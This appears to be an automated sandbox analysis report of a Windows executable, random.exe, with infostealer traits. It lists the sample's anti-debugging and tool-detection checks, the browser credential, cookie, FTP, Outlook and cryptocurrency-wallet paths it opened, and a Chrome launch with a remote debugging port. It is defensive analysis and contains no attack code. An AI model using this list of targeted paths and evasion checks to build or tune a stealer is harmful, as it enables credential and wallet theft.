Source: IIEHJKJJ.0.dr Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
Source: C:\Users\user\Desktop\random.exe System information queried: ModuleInformation Jump to behavior
Source: C:\Users\user\Desktop\random.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging

barindex
Source: C:\Users\user\Desktop\random.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\Desktop\random.exe Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\random.exe Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\random.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\random.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\random.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\random.exe Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\random.exe Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\random.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\random.exe File opened: NTICE
Source: C:\Users\user\Desktop\random.exe File opened: SICE
Source: C:\Users\user\Desktop\random.exe File opened: SIWVID
Source: C:\Users\user\Desktop\random.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\random.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\random.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\random.exe Code function: 0_2_6C9D5FF0 IsDebuggerPresent,??0PrintfTarget@mozilla@@IAE@XZ,?vprint@PrintfTarget@mozilla@@QAE_NPBDPAD@Z,OutputDebugStringA,__acrt_iob_func,_fileno,_dup,_fdopen,__stdio_common_vfprintf,fclose, 0_2_6C9D5FF0
Source: C:\Users\user\Desktop\random.exe Code function: 0_2_6C973480 ?ComputeProcessUptime@TimeStamp@mozilla@@CA_KXZ,GetCurrentProcess,GetProcessTimes,LoadLibraryW,GetProcAddress,__Init_thread_footer,__aulldiv,FreeLibrary,GetSystemTimeAsFileTime, 0_2_6C973480
Source: C:\Users\user\Desktop\random.exe Code function: 0_2_6C9AB66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_6C9AB66C
Source: C:\Users\user\Desktop\random.exe Code function: 0_2_6C9AB1F7 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_6C9AB1F7
Source: C:\Users\user\Desktop\random.exe Memory protected: page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion

barindex
Source: Yara match File source: Process Memory Space: random.exe PID: 7116, type: MEMORYSTR
Source: random.exe, random.exe, 00000000.00000002.2551141119.0000000000B62000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Program Manager
Source: C:\Users\user\Desktop\random.exe Code function: 0_2_6C9AB341 cpuid 0_2_6C9AB341
Source: C:\Users\user\Desktop\random.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Source: C:\Users\user\Desktop\random.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Source: C:\Users\user\Desktop\random.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\random.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\random.exe Code function: 0_2_6C9735A0 ?Startup@TimeStamp@mozilla@@SAXXZ,InitializeCriticalSectionAndSpinCount,getenv,QueryPerformanceFrequency,_strnicmp,GetSystemTimeAdjustment,__aulldiv,QueryPerformanceCounter,EnterCriticalSection,LeaveCriticalSection,QueryPerformanceCounter,EnterCriticalSection,LeaveCriticalSection,__aulldiv,strcmp,strcmp,_strnicmp, 0_2_6C9735A0

Stealing of Sensitive Information

barindex
Source: Yara match File source: 00000000.00000002.2551905997.000000000150E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.2149505176.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2550910093.00000000007A1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: random.exe PID: 7116, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: Process Memory Space: random.exe PID: 7116, type: MEMORYSTR
Source: random.exe, 00000000.00000002.2550910093.000000000086C000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: \Electrum\wallets\
Source: random.exe, 00000000.00000002.2550910093.000000000086C000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: \ElectronCash\wallets\
Source: random.exe, 00000000.00000002.2550910093.000000000086C000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: \Electrum\wallets\
Source: random.exe, 00000000.00000002.2550910093.000000000086C000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: window-state.json
Source: random.exe, 00000000.00000002.2550910093.000000000086C000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: Jaxx Desktop (old)
Source: random.exe, 00000000.00000002.2550910093.000000000086C000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: exodus.conf.json
Source: random.exe, 00000000.00000002.2550910093.000000000086C000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: \Exodus\
Source: random.exe, 00000000.00000002.2550910093.000000000086C000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: info.seco
Source: random.exe, 00000000.00000002.2550910093.000000000086C000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: ElectrumLTC
Source: random.exe, 00000000.00000002.2550910093.000000000086C000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: passphrase.json
Source: random.exe, 00000000.00000002.2550910093.000000000086C000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: \jaxx\Local Storage\
Source: random.exe, 00000000.00000002.2551905997.0000000001586000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: C:\Users\user\AppData\Roaming\\Ethereum\\keystore*
Source: random.exe, 00000000.00000002.2550910093.000000000086C000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: Exodus
Source: random.exe, 00000000.00000002.2551905997.0000000001586000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Binance\simple-storage.json*
Source: random.exe, 00000000.00000002.2550910093.000000000086C000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: file__0.localstorage
Source: random.exe, 00000000.00000002.2551905997.0000000001586000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: C:\Users\user\AppData\Roaming\\Ethereum\\keystore*
Source: random.exe, 00000000.00000002.2551905997.0000000001586000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\*.*
Source: random.exe, 00000000.00000002.2550910093.000000000086C000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: \Exodus\exodus.wallet\
Source: random.exe, 00000000.00000002.2550910093.000000000086C000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: MultiDoge
Source: random.exe, 00000000.00000002.2550910093.000000000086C000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: seed.seco
Source: random.exe, 00000000.00000002.2551905997.0000000001586000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: C:\Users\user\AppData\Roaming\\Ethereum\\keystore*
Source: random.exe, 00000000.00000002.2550910093.000000000086C000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: \Electrum-LTC\wallets\
Source: random.exe, 00000000.00000002.2551905997.0000000001586000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\*.*
Source: C:\Users\user\Desktop\random.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core Jump to behavior
Source: C:\Users\user\Desktop\random.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite-wal Jump to behavior
Source: C:\Users\user\Desktop\random.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\prefs.js Jump to behavior
Source: C:\Users\user\Desktop\random.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite-shm Jump to behavior
Source: C:\Users\user\Desktop\random.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\random.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Users\user\Desktop\random.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite Jump to behavior
Source: C:\Users\user\Desktop\random.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite-wal Jump to behavior
Source: C:\Users\user\Desktop\random.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite Jump to behavior
Source: C:\Users\user\Desktop\random.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History-journal Jump to behavior
Source: C:\Users\user\Desktop\random.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\random.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite-shm Jump to behavior
Source: C:\Users\user\Desktop\random.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History Jump to behavior
Source: C:\Users\user\Desktop\random.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History Jump to behavior
Source: C:\Users\user\Desktop\random.exe File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml Jump to behavior
Source: C:\Users\user\Desktop\random.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\random.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\random.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\random.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\random.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\random.exe File opened: C:\Users\user\AppData\Roaming\Exodus\ Jump to behavior
Source: C:\Users\user\Desktop\random.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\ Jump to behavior
Source: C:\Users\user\Desktop\random.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\ Jump to behavior
Source: C:\Users\user\Desktop\random.exe File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\random.exe File opened: C:\Users\user\AppData\Roaming\MultiDoge\ Jump to behavior
Source: C:\Users\user\Desktop\random.exe File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\ Jump to behavior
Source: C:\Users\user\Desktop\random.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\ Jump to behavior
Source: C:\Users\user\Desktop\random.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\ Jump to behavior
Source: C:\Users\user\Desktop\random.exe File opened: C:\Users\user\AppData\Roaming\Binance\ Jump to behavior
Source: C:\Users\user\Desktop\random.exe File opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\random.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\ Jump to behavior
Source: C:\Users\user\Desktop\random.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\ Jump to behavior
Source: C:\Users\user\Desktop\random.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\ Jump to behavior
Source: C:\Users\user\Desktop\random.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\ Jump to behavior
Source: C:\Users\user\Desktop\random.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\ Jump to behavior
Source: C:\Users\user\Desktop\random.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\ Jump to behavior
Source: C:\Users\user\Desktop\random.exe File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\ Jump to behavior
Source: C:\Users\user\Desktop\random.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 Jump to behavior
Source: C:\Users\user\Desktop\random.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 Jump to behavior
Source: C:\Users\user\Desktop\random.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 Jump to behavior
Source: C:\Users\user\Desktop\random.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004 Jump to behavior
Source: Yara match File source: 00000000.00000002.2550910093.000000000086C000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: random.exe PID: 7116, type: MEMORYSTR

Remote Access Functionality

barindex
Source: C:\Users\user\Desktop\random.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
Source: Yara match File source: 00000000.00000002.2551905997.000000000150E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.2149505176.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2550910093.00000000007A1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: random.exe PID: 7116, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: Process Memory Space: random.exe PID: 7116, type: MEMORYSTR
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs